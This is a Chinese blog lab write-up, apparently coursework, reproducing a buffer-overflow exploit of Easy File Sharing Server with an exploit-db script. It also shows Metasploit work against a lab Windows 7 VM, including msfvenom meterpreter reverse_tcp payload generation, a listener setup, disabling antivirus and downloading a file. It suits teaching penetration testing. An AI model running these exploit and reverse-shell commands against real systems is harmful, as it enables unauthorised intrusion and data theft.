复现任务——漏洞渗透测试及Metasploit应用

已于 2023-12-29 17:04:27 修改
阅读量1k 收藏 24
点赞数 21
文章标签: 网络
于 2023-12-29 17:00:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74087834/article/details/135226125
版权

 一、漏洞渗透测试

(一)任务要求


1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。
2、利用Nmap扫描发现靶机(Windows)运行了该服务。
3、利用该漏洞,使得靶机运行计算器。 见第六章PPT或PDF文档

 (二)复现过程

1、复现环境

攻击机

系统:kali-Linux 

IP地址:192.168.43.137

靶机

系统:Windows7

IP地址: 192.168.43.136

2、前置准备

靶机下载安装easy file sharing server

安装后把url设置为本机ip192.168.43.136,端口设置为80

图1.2.2.1:下载完成界面

3、漏洞扫描

在攻击机kali上使用nmap扫描靶机开放端口,指令如下:

nmap -sV 目的地址

我使用的是 nmap -sV 192.168.43.136,扫描结果如下

图1.2.3.1:靶机端口开放情况

可以看到在开放的80端口使用了 easy file sharing server服务,有漏洞,我们可以挖掘利用

4、漏洞使用

首先打开服务对应的网址

图1.2.4.1:打开网址

可以发现在输入字符过多时程序会崩溃,判断含有缓冲区溢出漏洞

图1.2.4.2:服务进程出现崩溃情况 

于是我们可以利用这个漏洞进行打开计算器操作

利用kali自带的 searchsploit命令可以查找此服务含有漏洞所对应的python脚本,命令如下:

 searchsploit easy file sharing

图1.2.4.3:扫描结果 

上图中左栏是渗透模块的名称,右侧是对应的位置

我们的目的是打开靶机的计算器,位置是usr/share/exploitdb/exploits/windows/remote/39009.py

在kali打开另一个终端来执行命令,命令格式如下:python2 位置 靶机ip 端口号 

python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.43.136 80

 

图1.2.4.4:执行命令

这时打开靶机,可以发现计算器成功被打开,此漏洞复现成功

图1.2.4.5:计算器打开

二、Metasploit应用


 

(一)任务要求

1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。见课本P127-133
 

(二)复现过程

1、复现环境

攻击机

系统:kali-Linux 

IP地址:192.168.24.129

靶机

系统:Windows7

IP地址: 192.168.24.130

2、生成主控端与被控端

(1)、生成主控端

使用命令mfsconsole

图2.2.2.1:打开mfsconsole

打开后依次使用以下命令

Using configured payload generic/shell_reverse_tcp

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.24.129

set lport 5000

msexploit

 结果如下:

图2.2.2.2:设置主控端

(2)、生成受控端

首先使用如下命令

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.24.129 lport=5000 -f exe -o /root/payload.exe

在这段命令中lhost是你本机(kali)的ip地址,lport和lhost要和上面生成主控端的代码一致 

这个命令的作用是在/root/目录下生成一个payload.exe文件,这个payload文件实际上就是一个可以对Windows进行操作的木马程序。

生成结果如下

图2.2.2.3:命令执行结果

可以看到成功生成payload.exe且保存路径为/root/ 保存结果如下

图2.2.2.4:生成结果 

3、获得靶机(Windows)控制权 

(1)、将文件复制到Windows中

在复制过程中发现了一个问题:木马文件生成在/root/目录下,无法直接复制到Windows7中

解决方法如下:

首先在kali桌面上打开root终端,然后使用如下命令将文件复制到桌面

cp /root/payload.exe ./payload.exe

其中前半段是源文件的地址路径,后半部分是命名,这是Linux命令基础知识,就不多说了。 

然后将物理机和Windows7虚拟机防火墙都关掉(最好物理机的杀毒软件也退出,我在做的时候火绒“帮我”删除了好多次文件)

做完这几步就发现可以复制了。

图2.2.3.1:木马复制到靶机 

(2)、控制靶机 

这时木马成功复制到靶机,你就可以点击靶机来进行反向连接了。点击后靶机无任何反应,而攻击机(kali)终端界面会出现以下反应。

 图2.2.3.2:反向连接成功

 这时可以控制查看木马所在目录的文件

图2.2.3.3:查看木马所在目录文件

4、下载靶机文件

使用download命令下载,我提前在靶机桌面上创建了一个1.txt文件作为下载目标。

图2.2.4.1:下载文件指令 

这时就可以在/root/地址下查看下载的文件

I am Mr. Chen
关注
  • 21
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Python程序设计-安全渗透测试-漏洞渗透模块
Xunuannuan的博客
04-26 864
测试软件的溢出漏洞 FreeFloat FTP Server会在运行的主机上建立一个FTP,其他计算机上的用户可以登录到这个FTP上来存取文件 例如,在主机192.168.0.116的C盘中运行这个FTP软件,在另外一台计算机中可以使用FTP下载工具或者命令的方式进行访问。这里采用命令的方式对其进行访问,(使用 FreeFloat FTP Server这个服务器对登录没有任何的限制,输入任意的用...
网络安全基础之Windows漏洞复现 (MS08-067)
weixin_60888404的博客
06-03 2729
本次介绍Windows系统漏洞 MS08-087Windows Server服务 RPC 缓冲区远程溢出漏洞编号 MS08-067MS08_067漏洞渗透攻击原理其原理就是攻击者利用受害者默认开启的SMB服务端口445端口发送恶意的资料到这个端口,通过MSRPC接口调用Server服务的函数,并破坏程序的栈缓冲区,利用远程代码执行权限,从而控制主机前期准备: 靶机:Windows 2003 (未打补丁) 攻击机:kali LinuxMS08_067漏洞渗透攻击过程使用
MS08-067 漏洞复现报告
Williamanddog的博客
08-29 2381
如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验 证即可利用此漏洞运行任意代码。漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。.
Web渗透实例复现(一)(通达OA11.2)
InterplanetaryW的博客
07-13 1964
以通达OA系统11.2版本为案例的Web渗透 1. 渗透背景: 目标站点:VM虚拟机 O A 版本:通达OA系统11.2 目标系统:Windows server 2008 R2 SP1 威胁等级:高危 渗透工具:BurpSuite pro、SeayDzend、TongDaOA-Fake-User、PHPstorm、蚁剑、VMware 2. 存在漏洞 前台任意用户登录漏洞 前台未授权访问漏洞 管理后台文件上传漏洞 后台SQL注入漏洞 文件包含getshell 3. 漏洞复现 3.1 前台任意用户登录漏洞
kali上使用msf渗透win7(永恒之蓝操作复现)初学者指南
热门推荐
weixin_45596770的博客
04-18 1万+
首先开篇先放出我使用的kali 与 win7 的网盘链接: 大家VMware上新建虚拟机即可~ 简单介绍一个Metasploit,一个免费的、开源的渗透测试框架,kali上可以直接使用~ 1. Metasploit初始化 在使用之前我们需要对Metasploit进行初始化,并启动: 终端窗口的命令行输入如下命令 systemctl start postgresql systemctl enable postgresql 启动专用的数据库,并设置为每次开机自动启动 msfconsole 或者 点击kali
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
Metasploit框架是一个综合的渗透测试平台,它提供了大量的模块,包括漏洞利用、扫描、后渗透工具等。这些模块使得安全专家能够快速地识别和利用目标系统中的漏洞。下面我们将详细讨论Metasploit的主要组成部分及其...
metasploit中使用lnk漏洞渗透测试.doc
03-18
Metasploit 是一个开源的渗透测试框架,广泛应用网络安全测试和漏洞利用。LNK 漏洞是一种常见的 Windows 漏洞,通过exploit 可以获得目标机的shell 权限。本文将详细介绍如何使用 Metasploit 中的 LNK 漏洞进行...
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
渗透测试Metasploit
06-16
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序...
Metasploit渗透测试指南 修订版
09-21
Metasploit渗透测试指南 修订版》是一本深度探讨Metasploit框架的权威书籍,旨在帮助初学者和专业人士理解并掌握网络安全领域的渗透测试技术。Metasploit是一款强大的开源安全工具,广泛应用于安全评估、漏洞验证...
Kali/ubuntu 搭建DNS服务器
仰望星空
06-01 3041
摘要: 在本机上搭建一个dns服务器,实现了正向解析(域名->IP)部分 本机IP:192.168.43.136 文章目录搭建步骤1.下载相关文件bind92.修改配置文件3.设置电脑的DNS服务器4.重启bind9并测试参考文献 搭建步骤 1.下载相关文件bind9 sudo apt-get install -y bind9 2.修改配置文件 配置需要修改的文件有named.conf.local named.conf.options, 先做备份 cd /etc/bind sudo cp named.
内网穿透从搭建到溯源
whatday的专栏
01-11 809
目录 背景 内网穿透及溯源 网络层隧道搭建 传输层隧道搭建 应用层隧道搭建 测试通信 案例 总结 背景 在攻防博弈这个永久的话题中,永远不会缺少一个重要角色即内网穿透。当渗透测试人员在进入内网,需要扩大战果的时候,往往会遇到内网的一些防护策略,不外乎边界设备、防火墙及入侵检测设备对端口或者数据包的拦截,导致流量无法出网,此时就需要熟练掌握内网穿透技术,从复杂的内网环境中获取稳定的流量交互,从而达到目的。 本文针对边界安全设备等对内网端口的屏蔽及数据包的拦截,从不同的网络协议层进行搭建隧
数据同步RSYNC
weixin_43803147的博客
11-20 380
RSYNC:  rsync(Remote sync)是linux系统自带的镜像备份工具,支持本地复制和远程复制。 sync类型: sync:同步 async:异步 rsync:远程同步 inotify:可以监控目录,文件系统,删除,创建,修改文件属性 特点: 增量复制,第一次数据同步为全量复制,之后为增量复制。 支持匿名复制,也支持身份验证。 可以镜像目录树,文件系统。 格式: #客户端拉...
网络渗透测试漏洞复现任务
m0_64229840的博客
11-21 467
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100。3、利用该漏洞,使得靶机运行计算器。P116-119
漏洞渗透测试复现easy file sharing server
qq_61947585的博客
11-21 760
渗透测试 easy file sharing server
Linux无文件木马程序渗透测试复现
永远是少年
06-15 1130
今天继续给大家介绍渗透测试相关知识,本文主要内容是Linux无文件木马程序渗透测试复现。 一、实战介绍 二、初次渗透测试 三、无文件木马渗透测试
漏洞复现(CVE-2017-10271)
PDblue的博客
03-27 9651
使用https://github.com/vulhub/vulhub在本地进行漏洞环境搭建,需要使用的工具是https://github.com/hanc00l/weblogic_wls_wsat_rce 环境搭建完成后通过浏览器进行访问 使用工具对漏洞进行验证 向服务器上传后门文件 通过浏览器访问后门文件 仅限于本地漏洞环境验证。...
渗透测试干货必看,手把手教你复现 | weblogic系列之CVE-2017-10271漏洞复现
Hexuefu_Bayonet的博客
06-06 687
#渗透测试 | CVE-2017-10271漏洞复现 1.下载vulhub-master压缩包到kali中,解压缩 2.进入到 /vulhub-master/weblogic/CVE-2017-10271目录下 3.开启docker容器 service docker start 或 systemctl start docker 4.接着启动docker编译 5.查看容器状态 6.查看漏洞靶场的ip地址 7.查看下端口是否映射成功,出现下面的页面说明搭建成功 8.访问该路径下的/wls-ws
网络渗透复现A
worker___的博客
12-15 195
一、漏洞渗透测试 1、靶机安装easy file sharing web server(efssetup_2018.zip) 2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100 3、利用该漏洞,使得靶机运行计算器。P116-119 实验过程 靶机安装efssetup 配置8000端口 查找EasyFileSharing的有关漏洞 searchsploit Easy File Sharing Web Server 再输入 python /usr/share/exp
Pentest with metasploit - overview.pdf
最新发布
10-06
网络安全渗透测试漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值